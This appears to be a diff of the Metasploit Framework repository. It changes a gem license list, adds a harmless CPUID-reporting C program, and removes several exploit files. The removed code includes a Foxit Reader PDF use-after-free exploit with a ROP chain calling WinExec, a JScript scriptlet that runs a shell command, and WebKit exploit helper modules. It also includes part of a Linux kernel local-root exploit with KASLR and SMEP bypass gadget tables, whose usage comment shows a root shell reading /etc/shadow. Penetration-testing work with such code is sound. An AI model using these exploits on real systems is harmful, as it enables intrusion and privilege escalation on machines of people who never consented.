-bindata, 2.4.4, ruby
+arel-helpers, 2.4.0, unknown
+backports, 3.8.0, MIT
+bcrypt, 3.1.11, MIT
+bindata, 2.4.0, ruby
 bit-struct, 0.16, ruby
 builder, 3.2.3, MIT
-bundler, 1.17.3, MIT
-coderay, 1.1.2, MIT
-concurrent-ruby, 1.0.5, MIT
-cookiejar, 0.3.3, unknown
-crass, 1.0.4, MIT
-daemons, 1.3.1, MIT
+bundler, 1.15.1, MIT
+coderay, 1.1.1, MIT
 diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
-dnsruby, 1.61.2, "Apache 2.0"
-docile, 1.3.1, MIT
-ed25519, 1.2.4, MIT
-em-http-request, 1.1.5, MIT
-em-socksify, 0.3.2, MIT
+dnsruby, 1.60.1, "Apache 2.0"
+docile, 1.1.5, MIT
 erubis, 2.7.0, MIT
-eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 4.11.1, MIT
-factory_bot_rails, 4.11.1, MIT
-faker, 1.9.1, MIT
-faraday, 0.15.4, MIT
-filesize, 0.2.0, MIT
-fivemat, 1.3.7, MIT
+factory_girl, 4.8.0, MIT
+factory_girl_rails, 4.8.0, MIT
+faraday, 0.12.1, MIT
+filesize, 0.1.1, MIT
+fivemat, 1.3.5, MIT
+google-protobuf, 3.3.0, "New BSD"
+googleauth, 0.5.1, "Apache 2.0"
+grpc, 1.4.1, "New BSD"
 hashery, 2.1.2, "Simplified BSD"
-http_parser.rb, 0.6.0, MIT
-i18n, 0.9.5, MIT
+i18n, 0.8.6, MIT
 jsobfu, 0.4.2, "New BSD"
 json, 2.1.0, ruby
-loofah, 2.2.3, MIT
+jwt, 1.5.6, MIT
+little-plugger, 1.1.4, MIT
+logging, 2.2.2, MIT
+loofah, 2.0.3, MIT
+memoist, 0.16.0, MIT
 metasm, 1.0.3, LGPL
+metasploit-aggregator, 0.2.1, "New BSD"
 metasploit-concern, 2.0.5, "New BSD"
-metasploit-credential, 3.0.2, "New BSD"
-metasploit-framework, 5.0.2, "New BSD"
+metasploit-credential, 2.0.10, "New BSD"
+metasploit-framework, 4.15.0, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.3.58, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 3.0.4, "New BSD"
-metasploit_payloads-mettle, 0.5.1, "3-clause (or ""modified"") BSD"
-method_source, 0.9.2, MIT
-mini_portile2, 2.4.0, MIT
-minitest, 5.11.3, MIT
-mqtt, 0.5.0, MIT
-msgpack, 1.2.6, "Apache 2.0"
+metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 2.0.15, "New BSD"
+metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
+method_source, 0.8.2, MIT
+mini_portile2, 2.2.0, MIT
+minitest, 5.10.2, MIT
+msgpack, 1.1.0, "Apache 2.0"
+multi_json, 1.12.1, MIT
 multipart-post, 2.0.0, MIT
 nessus_rest, 0.1.6, MIT
-net-ssh, 5.1.0, MIT
-network_interface, 0.0.2, MIT
-nexpose, 7.2.1, "New BSD"
-nokogiri, 1.10.1, MIT
-octokit, 4.13.0, MIT
-openssl-ccm, 1.2.2, MIT
+net-ssh, 4.1.0, MIT
+network_interface, 0.0.1, MIT
+nexpose, 6.1.0, BSD
+nokogiri, 1.8.0, MIT
+octokit, 4.7.0, MIT
+openssl-ccm, 1.2.1, MIT
 openvas-omp, 0.0.4, MIT
+os, 0.9.6, MIT
 packetfu, 1.1.13, BSD
 patch_finder, 1.0.2, "New BSD"
-pcaprub, 0.13.0, LGPL-2.1
-pdf-reader, 2.2.0, MIT
+pcaprub, 0.12.4, LGPL-2.1
+pdf-reader, 2.0.0, MIT
 pg, 0.20.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
-postgres_ext, 3.0.1, MIT
-pry, 0.12.2, MIT
-public_suffix, 3.0.3, MIT
-rack, 1.6.11, MIT
-rack-protection, 1.5.5, MIT
+postgres_ext, 3.0.0, MIT
+pry, 0.10.4, MIT
+public_suffix, 2.0.5, MIT
+rack, 1.6.8, MIT
 rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
-rails-dom-testing, 1.0.9, MIT
-rails-html-sanitizer, 1.0.4, MIT
-railties, 4.2.11, MIT
-rake, 12.3.2, MIT
-rb-readline, 0.5.5, BSD
-recog, 2.1.45, unknown
+rails-dom-testing, 1.0.8, MIT
+rails-html-sanitizer, 1.0.3, MIT
+railties, 4.2.9, MIT
+rake, 12.0.0, MIT
+rb-readline, 0.5.4, BSD
+recog, 2.1.11, unknown
 redcarpet, 3.4.0, MIT
-rex-arch, 0.1.13, "New BSD"
-rex-bin_tools, 0.1.6, "New BSD"
-rex-core, 0.1.13, "New BSD"
+rex-arch, 0.1.9, "New BSD"
+rex-bin_tools, 0.1.4, "New BSD"
+rex-core, 0.1.11, "New BSD"
 rex-encoder, 0.1.4, "New BSD"
-rex-exploitation, 0.1.20, "New BSD"
+rex-exploitation, 0.1.15, "New BSD"
 rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"
 rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.79, "New BSD"
-rex-random_identifier, 0.1.4, "New BSD"
+rex-powershell, 0.1.72, "New BSD"
+rex-random_identifier, 0.1.2, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.15, "New BSD"
-rex-sslscan, 0.1.5, "New BSD"
+rex-socket, 0.1.8, "New BSD"
+rex-sslscan, 0.1.4, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
-rex-text, 0.2.21, "New BSD"
+rex-text, 0.2.17, "New BSD"
 rex-zip, 0.1.3, "New BSD"
 rkelly-remix, 0.0.7, MIT
-rspec, 3.8.0, MIT
-rspec-core, 3.8.0, MIT
-rspec-expectations, 3.8.2, MIT
-rspec-mocks, 3.8.0, MIT
-rspec-rails, 3.8.1, MIT
+robots, 0.10.1, MIT
+rspec, 3.6.0, MIT
+rspec-core, 3.6.0, MIT
+rspec-expectations, 3.6.0, MIT
+rspec-mocks, 3.6.0, MIT
+rspec-rails, 3.6.0, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.8.0, MIT
-ruby-macho, 2.1.0, MIT
+rspec-support, 3.6.0, MIT
 ruby-rc4, 0.1.5, MIT
-ruby_smb, 1.0.5, "New BSD"
+ruby_smb, 0.0.18, "New BSD"
 rubyntlm, 0.6.2, MIT
-rubyzip, 1.2.2, "Simplified BSD"
+rubyzip, 1.2.1, "Simplified BSD"
 sawyer, 0.8.1, MIT
-simplecov, 0.16.1, MIT
-simplecov-html, 0.10.2, MIT
-sinatra, 1.4.8, MIT
+signet, 0.7.3, "Apache 2.0"
+simplecov, 0.14.1, MIT
+simplecov-html, 0.10.1, MIT
+slop, 3.6.0, MIT
 sqlite3, 1.3.13, "New BSD"
 sshkey, 1.9.0, MIT
-swagger-blocks, 2.0.2, MIT
-thin, 1.7.2, "GPLv2+, Ruby 1.8"
-thor, 0.20.3, MIT
+thor, 0.19.4, MIT
 thread_safe, 0.3.6, "Apache 2.0"
-tilt, 2.0.9, MIT
 timecop, 0.9.1, MIT
 ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 1.2.5, MIT
-tzinfo-data, 1.2018.9, MIT
-warden, 1.2.7, MIT
+tzinfo, 1.2.3, MIT
+tzinfo-data, 1.2017.2, MIT
 windows_error, 0.1.2, BSD
 xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-yard, 0.9.16, MIT
+yard, 0.9.9, MIT

data/cpuinfo/build.sh

@@ -0,0 +1,11 @@
+#!/bin/sh
+
+gcc -o cpuinfo.ia32.bin cpuinfo.c -static -m32 -Wall && \
+strip cpuinfo.ia32.bin && \
+gcc -o cpuinfo.ia64.bin cpuinfo.c -static -m64 -Wall && \
+strip cpuinfo.ia64.bin && \
+i586-mingw32msvc-gcc -m32 -static -Wall -o cpuinfo.exe cpuinfo.c && \
+strip cpuinfo.exe
+
+ls -la cpuinfo.ia32.bin cpuinfo.ia64.bin cpuinfo.exe
+

data/cpuinfo/cpuinfo.c

@@ -0,0 +1,64 @@
+// This is a slightly modified copy of the METASM pe-ia32-cpuid.rb example
+
+/*
+#!/usr/bin/env ruby
+#    This file is part of Metasm, the Ruby assembly manipulation suite
+#    Copyright (C) 2006-2009 Yoann GUILLOT
+#
+#    Licence is LGPL, see LICENCE in the top-level directory
+
+
+#
+# this sample shows the compilation of a slightly more complex program
+# it displays in a messagebox the result of CPUID
+#
+
+*/
+
+#include <unistd.h>
+#include <stdio.h>
+
+static char *featureinfo[32] = {
+	"fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8",
+	"apic", "unk10", "sep", "mtrr", "pge", "mca", "cmov", "pat",
+	"pse36", "psn", "clfsh", "unk20", "ds", "acpi", "mmx",
+	"fxsr", "sse", "sse2", "ss", "htt", "tm", "unk30", "pbe"
+}, *extendinfo[32] = {
+	"sse3", "unk1", "unk2", "monitor", "ds-cpl", "unk5-vt", "unk6", "est",
+	"tm2", "unk9", "cnxt-id", "unk12", "cmpxchg16b", "unk14", "unk15",
+	"unk16", "unk17", "unk18", "unk19", "unk20", "unk21", "unk22", "unk23",
+	"unk24", "unk25", "unk26", "unk27", "unk28", "unk29", "unk30", "unk31"
+};
+
+#define cpuid(id) __asm__( "cpuid" : "=a"(eax), "=b"(ebx), "=c"(ecx), "=d"(edx) : "a"(id), "b"(0), "c"(0), "d"(0))
+#define b(val, base, end) ((val << (31-end)) >> (31-end+base))
+int main(void)
+{
+
+	unsigned long eax, ebx, ecx, edx;
+	unsigned long i;
+
+	cpuid(0);
+	fprintf(stdout, "VENDOR: %.4s%.4s%.4s\n", (char *)&ebx, (char *)&edx, (char *)&ecx);
+
+	cpuid(1);
+	fprintf(stdout, "MODEL: family=%ld model=%ld stepping=%ld efamily=%ld emodel=%ld ",
+			b(eax, 8, 11), b(eax, 4, 7), b(eax, 0, 3), b(eax, 20, 27), b(eax, 16, 19));
+	fprintf(stdout, "brand=%ld cflush sz=%ld*8 nproc=%ld apicid=%ld\n",
+			b(ebx, 0, 7), b(ebx, 8, 15), b(ebx, 16, 23), b(ebx, 24, 31));
+
+	fprintf(stdout, "FLAGS:");
+	for (i=0 ; i<32 ; i++)
+		if (edx & (1 << i))
+			fprintf(stdout, " %s", featureinfo[i]);
+
+	for (i=0 ; i<32 ; i++)
+		if (ecx & (1 << i))
+			fprintf(stdout, " %s", extendinfo[i]);
+
+	fprintf(stdout, "\n");
+	fflush(stdout);
+
+	return 0;
+}
+

data/exploits/CVE-2018-0824/script_template

@@ -1,16 +0,0 @@
-<?xml version='1.0'?>
-<package>
-<component id='giffile'>
-<registration
-	description='Dummy'
-	progid='giffile'
-	version='1.00'
-	remotable='True'>
-</registration>
-<script language='JScript'>
-<![CDATA[
-	var q = new ActiveXObject('Wscript.Shell').Run("SCRIPTED_COMMAND");
-]]>
-</script>
-</component>
-</package>

data/exploits/CVE-2018-4233/int64.js

@@ -1,182 +0,0 @@
-//
-// Tiny module that provides big (64bit) integers.
-//
-// Copyright (c) 2016 Samuel Groß
-//
-// Requires utils.js
-//
-
-// Datatype to represent 64-bit integers.
-//
-// Internally, the integer is stored as a Uint8Array in little endian byte order.
-function Int64(v) {
-    // The underlying byte array.
-    var bytes = new Uint8Array(8);
-
-    switch (typeof v) {
-        case 'number':
-            v = '0x' + Math.floor(v).toString(16);
-        case 'string':
-            if (v.startsWith('0x'))
-                v = v.substr(2);
-            if (v.length % 2 == 1)
-                v = '0' + v;
-
-            var bigEndian = unhexlify(v, 8);
-            bytes.set(Array.from(bigEndian).reverse());
-            break;
-        case 'object':
-            if (v instanceof Int64) {
-                bytes.set(v.bytes());
-            } else {
-                if (v.length != 8)
-                    throw TypeError("Array must have excactly 8 elements.");
-                bytes.set(v);
-            }
-            break;
-        case 'undefined':
-            break;
-        default:
-            throw TypeError("Int64 constructor requires an argument.");
-    }
-
-    // Return a double whith the same underlying bit representation.
-    this.asDouble = function() {
-        // Check for NaN
-        if (bytes[7] == 0xff && (bytes[6] == 0xff || bytes[6] == 0xfe))
-            throw new RangeError("Integer can not be represented by a double");
-
-        return Struct.unpack(Struct.float64, bytes);
-    };
-
-    // Return a javascript value with the same underlying bit representation.
-    // This is only possible for integers in the range [0x0001000000000000, 0xffff000000000000)
-    // due to double conversion constraints.
-    this.asJSValue = function() {
-        if ((bytes[7] == 0 && bytes[6] == 0) || (bytes[7] == 0xff && bytes[6] == 0xff))
-            throw new RangeError("Integer can not be represented by a JSValue");
-
-        // For NaN-boxing, JSC adds 2^48 to a double value's bit pattern.
-        this.assignSub(this, 0x1000000000000);
-        var res = Struct.unpack(Struct.float64, bytes);
-        this.assignAdd(this, 0x1000000000000);
-
-        return res;
-    };
-
-    // Return the underlying bytes of this number as array.
-    this.bytes = function() {
-        return Array.from(bytes);
-    };
-
-    // Return the byte at the given index.
-    this.byteAt = function(i) {
-        return bytes[i];
-    };
-
-    // Return the value of this number as unsigned hex string.
-    this.toString = function() {
-        return '0x' + hexlify(Array.from(bytes).reverse());
-    };
-
-    // Basic arithmetic.
-    // These functions assign the result of the computation to their 'this' object.
-
-    // Decorator for Int64 instance operations. Takes care
-    // of converting arguments to Int64 instances if required.
-    function operation(f, nargs) {
-        return function() {
-            if (arguments.length != nargs)
-                throw Error("Not enough arguments for function " + f.name);
-            for (var i = 0; i < arguments.length; i++)
-                if (!(arguments[i] instanceof Int64))
-                    arguments[i] = new Int64(arguments[i]);
-            return f.apply(this, arguments);
-        };
-    }
-
-    // this = -n (two's complement)
-    this.assignNeg = operation(function neg(n) {
-        for (var i = 0; i < 8; i++)
-            bytes[i] = ~n.byteAt(i);
-
-        return this.assignAdd(this, Int64.One);
-    }, 1);
-
-    // this = a + b
-    this.assignAdd = operation(function add(a, b) {
-        var carry = 0;
-        for (var i = 0; i < 8; i++) {
-            var cur = a.byteAt(i) + b.byteAt(i) + carry;
-            carry = cur > 0xff | 0;
-            bytes[i] = cur;
-        }
-        return this;
-    }, 2);
-
-    // this = a - b
-    this.assignSub = operation(function sub(a, b) {
-        var carry = 0;
-        for (var i = 0; i < 8; i++) {
-            var cur = a.byteAt(i) - b.byteAt(i) - carry;
-            carry = cur < 0 | 0;
-            bytes[i] = cur;
-        }
-        return this;
-    }, 2);
-
-    // this = a ^ b
-    this.assignXor = operation(function sub(a, b) {
-        for (var i = 0; i < 8; i++) {
-            bytes[i] = a.byteAt(i) ^ b.byteAt(i);
-        }
-        return this;
-    }, 2);
-
-    // this = a & b
-    this.assignAnd = operation(function sub(a, b) {
-        for (var i = 0; i < 8; i++) {
-            bytes[i] = a.byteAt(i) & b.byteAt(i);
-        }
-        return this;
-    }, 2)
-}
-
-// Constructs a new Int64 instance with the same bit representation as the provided double.
-Int64.fromDouble = function(d) {
-    var bytes = Struct.pack(Struct.float64, d);
-    return new Int64(bytes);
-};
-
-// Convenience functions. These allocate a new Int64 to hold the result.
-
-// Return -n (two's complement)
-function Neg(n) {
-    return (new Int64()).assignNeg(n);
-}
-
-// Return a + b
-function Add(a, b) {
-    return (new Int64()).assignAdd(a, b);
-}
-
-// Return a - b
-function Sub(a, b) {
-    return (new Int64()).assignSub(a, b);
-}
-
-// Return a ^ b
-function Xor(a, b) {
-    return (new Int64()).assignXor(a, b);
-}
-
-// Return a & b
-function And(a, b) {
-    return (new Int64()).assignAnd(a, b);
-}
-
-// Some commonly used numbers.
-Int64.Zero = new Int64(0);
-Int64.One = new Int64(1);
-
-// That's all the arithmetic we need for exploiting WebKit.. :)

data/exploits/CVE-2018-4233/utils.js

@@ -1,78 +0,0 @@
-//
-// Utility functions.
-//
-// Copyright (c) 2016 Samuel Groß
-//
-
-// Return the hexadecimal representation of the given byte.
-function hex(b) {
-    return ('0' + b.toString(16)).substr(-2);
-}
-
-// Return the hexadecimal representation of the given byte array.
-function hexlify(bytes) {
-    var res = [];
-    for (var i = 0; i < bytes.length; i++)
-        res.push(hex(bytes[i]));
-
-    return res.join('');
-}
-
-// Return the binary data represented by the given hexdecimal string.
-function unhexlify(hexstr) {
-    if (hexstr.length % 2 == 1)
-        throw new TypeError("Invalid hex string");
-
-    var bytes = new Uint8Array(hexstr.length / 2);
-    for (var i = 0; i < hexstr.length; i += 2)
-        bytes[i/2] = parseInt(hexstr.substr(i, 2), 16);
-
-    return bytes;
-}
-
-function hexdump(data) {
-    if (typeof data.BYTES_PER_ELEMENT !== 'undefined')
-        data = Array.from(data);
-
-    var lines = [];
-    for (var i = 0; i < data.length; i += 16) {
-        var chunk = data.slice(i, i+16);
-        var parts = chunk.map(hex);
-        if (parts.length > 8)
-            parts.splice(8, 0, ' ');
-        lines.push(parts.join(' '));
-    }
-
-    return lines.join('\n');
-}
-
-// Simplified version of the similarly named python module.
-var Struct = (function() {
-    // Allocate these once to avoid unecessary heap allocations during pack/unpack operations.
-    var buffer      = new ArrayBuffer(8);
-    var byteView    = new Uint8Array(buffer);
-    var uint32View  = new Uint32Array(buffer);
-    var float64View = new Float64Array(buffer);
-
-    return {
-        pack: function(type, value) {
-            var view = type;        // See below
-            view[0] = value;
-            return new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT);
-        },
-
-        unpack: function(type, bytes) {
-            if (bytes.length !== type.BYTES_PER_ELEMENT)
-                throw Error("Invalid bytearray");
-
-            var view = type;        // See below
-            byteView.set(bytes);
-            return view[0];
-        },
-
-        // Available types.
-        int8:    byteView,
-        int32:   uint32View,
-        float64: float64View
-    };
-})();

data/exploits/CVE-2018-9948/template.pdf

@@ -1,125 +0,0 @@
-%PDF
-1 0 obj
-<</Pages 1 0 R /OpenAction 2 0 R>>
-2 0 obj
-<</S /JavaScript /JS (
-
-var heap_ptr   = 0;
-var foxit_base = 0;
-var pwn_array  = [];
-
-function prepare_heap(size){
-    var arr = new Array(size);
-    for(var i = 0; i < size; i++){
-        arr[i] = this.addAnnot({type: "Text"});;
-        if (typeof arr[i] == "object"){
-            arr[i].destroy();
-        }
-    }
-}
-
-function gc() {
-    const maxMallocBytes = 128 * 0x100000;
-    for (var i = 0; i < 3; i++) {
-        var x = new ArrayBuffer(maxMallocBytes);
-    }
-}
-
-function alloc_at_leak(){
-    for (var i = 0; i < 0x64; i++){
-        pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
-    }
-}
-
-function control_memory(){
-    for (var i = 0; i < 0x64; i++){
-        for (var j = 0; j < pwn_array[i].length; j++){
-            pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
-        }
-    }
-}
-
-function leak_vtable(){
-    var a = this.addAnnot({type: "Text"});
-
-    a.destroy();
-    gc();
-
-    prepare_heap(0x400);
-    var test = new ArrayBuffer(0x60);
-    var stolen = new Int32Array(test);
-
-    var leaked = stolen[0] & 0xffff0000;
-    foxit_base = leaked - 0x01f50000;
-}
-
-function leak_heap_chunk(){
-    var a = this.addAnnot({type: "Text"});
-    a.destroy();
-    prepare_heap(0x400);
-
-    var test = new ArrayBuffer(0x60);
-    var stolen = new Int32Array(test);
-
-    alloc_at_leak();
-    heap_ptr = stolen[1];
-}
-
-function reclaim(){
-    var arr = new Array(0x10);
-    for (var i = 0; i < arr.length; i++) {
-        arr[i] = new ArrayBuffer(0x60);
-        var rop = new Int32Array(arr[i]);
-
-        rop[0x00] = heap_ptr;                // pointer to our stack pivot from the TypedArray leak
-        rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
-        rop[0x02] = 0x72727272;              // junk
-        rop[0x03] = foxit_base + 0x00001450  // pop ebp; ret
-        rop[0x04] = 0xffffffff;              // ret of WinExec
-        rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
-        rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
-        rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
-        rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
-        rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
-        rop[0x0a] = foxit_base + 0x0041c6ca; // ret
-        rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
-        <%= rop %>
-        rop[0x17] = 0x00000000;              // adios, amigo
-    }
-}
-
-function trigger_uaf(){
-    var that = this;
-    var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
-    var arr = [1];
-    Object.defineProperties(arr,{
-        "0":{
-            get: function () {
-
-                that.getAnnot(0, "uaf").destroy();
-
-                reclaim();
-                return 1;
-            }
-        }
-    });
-
-    a.point = arr;
-}
-
-function main(){
-    leak_heap_chunk();
-    leak_vtable();
-    control_memory();
-    trigger_uaf();
-}
-
-if (app.platform == "WIN"){
-    if (app.isFoxit == "Foxit Reader"){
-        if (app.appFoxitVersion == "9.0.1.1049"){
-            main();
-        }
-    }
-}
-
-)>> trailer <</Root 1 0 R>>

data/exploits/cve-2017-1000112/exploit.c

@@ -1,884 +0,0 @@
-// A proof-of-concept local root exploit for CVE-2017-1000112.
-// Includes KASLR and SMEP bypasses. No SMAP bypass.
-// Tested on:
-// - Ubuntu trusty 4.4.0 kernels
-// - Ubuntu xenial 4.4.0 and 4.8.0 kernels
-// - Linux Mint rosa 4.4.0 kernels
-// - Linux Mint sarah 4.8.0 kernels
-// - Zorin OS 12.1 4.4.0-39 kernel
-//
-// Usage:
-// user@ubuntu:~$ uname -a
-// Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
-// user@ubuntu:~$ whoami
-// user
-// user@ubuntu:~$ id
-// uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
-// user@ubuntu:~$ gcc pwn.c -o pwn
-// user@ubuntu:~$ ./pwn 
-// [.] starting
-// [.] checking kernel version
-// [.] kernel version '4.8.0-58-generic' detected
-// [~] done, version looks good
-// [.] checking SMEP and SMAP
-// [~] done, looks good
-// [.] setting up namespace sandbox
-// [~] done, namespace sandbox set up
-// [.] KASLR bypass enabled, getting kernel addr
-// [~] done, kernel text:   ffffffffae400000
-// [.] commit_creds:        ffffffffae4a5d20
-// [.] prepare_kernel_cred: ffffffffae4a6110
-// [.] SMEP bypass enabled, mmapping fake stack
-// [~] done, fake stack mmapped
-// [.] executing payload ffffffffae40008d
-// [~] done, should be root now
-// [.] checking if we got root
-// [+] got r00t ^_^
-// root@ubuntu:/home/user# whoami
-// root
-// root@ubuntu:/home/user# id
-// uid=0(root) gid=0(root) groups=0(root)
-// root@ubuntu:/home/user# cat /etc/shadow
-// root:!:17246:0:99999:7:::
-// daemon:*:17212:0:99999:7:::
-// bin:*:17212:0:99999:7:::
-// sys:*:17212:0:99999:7:::
-// ...
-//
-// Andrey Konovalov <andreyknvl@gmail.com>
-// ---
-// Updated by <bcoles@gmail.com>
-// - support for distros based on Ubuntu kernel
-// - additional kernel targets
-// - additional KASLR bypasses
-// https://github.com/bcoles/kernel-exploits/tree/cve-2017-1000112
-
-#define _GNU_SOURCE
-
-#include <fcntl.h>
-#include <sched.h>
-#include <stdarg.h>
-#include <stdbool.h>
-#include <stdint.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <unistd.h>
-
-#include <linux/socket.h>
-#include <netinet/ip.h>
-#include <sys/klog.h>
-#include <sys/mman.h>
-#include <sys/utsname.h>
-
-#define DEBUG
-
-#ifdef DEBUG
-#	define dprintf printf
-#else
-#	define dprintf
-#endif
-
-#define ENABLE_KASLR_BYPASS		1
-#define ENABLE_SMEP_BYPASS		1
-
-char* SHELL = "/bin/bash";
-
-// Will be overwritten if ENABLE_KASLR_BYPASS is enabled.
-unsigned long KERNEL_BASE =		0xffffffff81000000ul;
-
-// Will be overwritten by detect_kernel().
-int kernel = -1;
-
-struct kernel_info {
-	const char* distro;
-	const char* version;
-	uint64_t commit_creds;
-	uint64_t prepare_kernel_cred;
-	uint64_t xchg_eax_esp_ret;
-	uint64_t pop_rdi_ret;
-	uint64_t mov_dword_ptr_rdi_eax_ret;
-	uint64_t mov_rax_cr4_ret;
-	uint64_t neg_rax_ret;
-	uint64_t pop_rcx_ret;
-	uint64_t or_rax_rcx_ret;
-	uint64_t xchg_eax_edi_ret;
-	uint64_t mov_cr4_rdi_ret;
-	uint64_t jmp_rcx;
-};
-
-struct kernel_info kernels[] = {
-	{ "trusty", "4.4.0-21-generic", 0x9d7a0, 0x9da80, 0x4520a, 0x30f75, 0x109957, 0x1a7a0, 0x3d6b7a, 0x1cbfc, 0x76453, 0x49d4d, 0x61300, 0x1b91d },
-	{ "trusty", "4.4.0-22-generic", 0x9d7e0, 0x9dac0, 0x4521a, 0x28c19d, 0x1099b7, 0x1a7f0, 0x3d781a, 0x1cc4c, 0x764b3, 0x49d5d, 0x61300, 0x48040 },
-	{ "trusty", "4.4.0-24-generic", 0x9d5f0, 0x9d8d0, 0x4516a, 0x1026cd, 0x107757, 0x1a810, 0x3d7a9a, 0x1cc6c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
-	{ "trusty", "4.4.0-28-generic", 0x9d760, 0x9da40, 0x4516a, 0x3dc58f, 0x1079a7, 0x1a830, 0x3d801a, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
-	{ "trusty", "4.4.0-31-generic", 0x9d760, 0x9da40, 0x4516a, 0x3e223f, 0x1079a7, 0x1a830, 0x3ddcca, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
-	{ "trusty", "4.4.0-34-generic", 0x9d760, 0x9da40, 0x4510a, 0x355689, 0x1079a7, 0x1a830, 0x3ddd1a, 0x1cc8c, 0x763b3, 0x49c5d, 0x612f0, 0x47f40 },
-	{ "trusty", "4.4.0-36-generic", 0x9d770, 0x9da50, 0x4510a, 0x1eec9d, 0x107a47, 0x1a830, 0x3de02a, 0x1cc8c, 0x763c3, 0x29595, 0x61300, 0x47f40 },
-	{ "trusty", "4.4.0-38-generic", 0x9d820, 0x9db00, 0x4510a, 0x598fd, 0x107af7, 0x1a820, 0x3de8ca, 0x1cc7c, 0x76473, 0x49c5d, 0x61300, 0x1a77b },
-	{ "trusty", "4.4.0-42-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3deb7a, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },
-	{ "trusty", "4.4.0-45-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3debda, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },
-	{ "trusty", "4.4.0-47-generic", 0x9d940, 0x9dc20, 0x4511a, 0x171f8d, 0x107bd7, 0x1a820, 0x3e241a, 0x1cc7c, 0x76463, 0x299f5, 0x61300, 0x1a77b },
-	{ "trusty", "4.4.0-51-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },
-	{ "trusty", "4.4.0-53-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },
-	{ "trusty", "4.4.0-57-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x39401d, 0x1097d7, 0x1a820, 0x3e527a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
-	{ "trusty", "4.4.0-59-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dbc4e, 0x1097d7, 0x1a820, 0x3e571a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
-	{ "trusty", "4.4.0-62-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x3ea46f, 0x109837, 0x1a820, 0x3e5e5a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
-	{ "trusty", "4.4.0-63-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
-	{ "trusty", "4.4.0-64-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
-	{ "trusty", "4.4.0-66-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
-	{ "trusty", "4.4.0-67-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x12a9dc, 0x109887, 0x1a820, 0x3e67ba, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
-	{ "trusty", "4.4.0-70-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
-	{ "trusty", "4.4.0-71-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
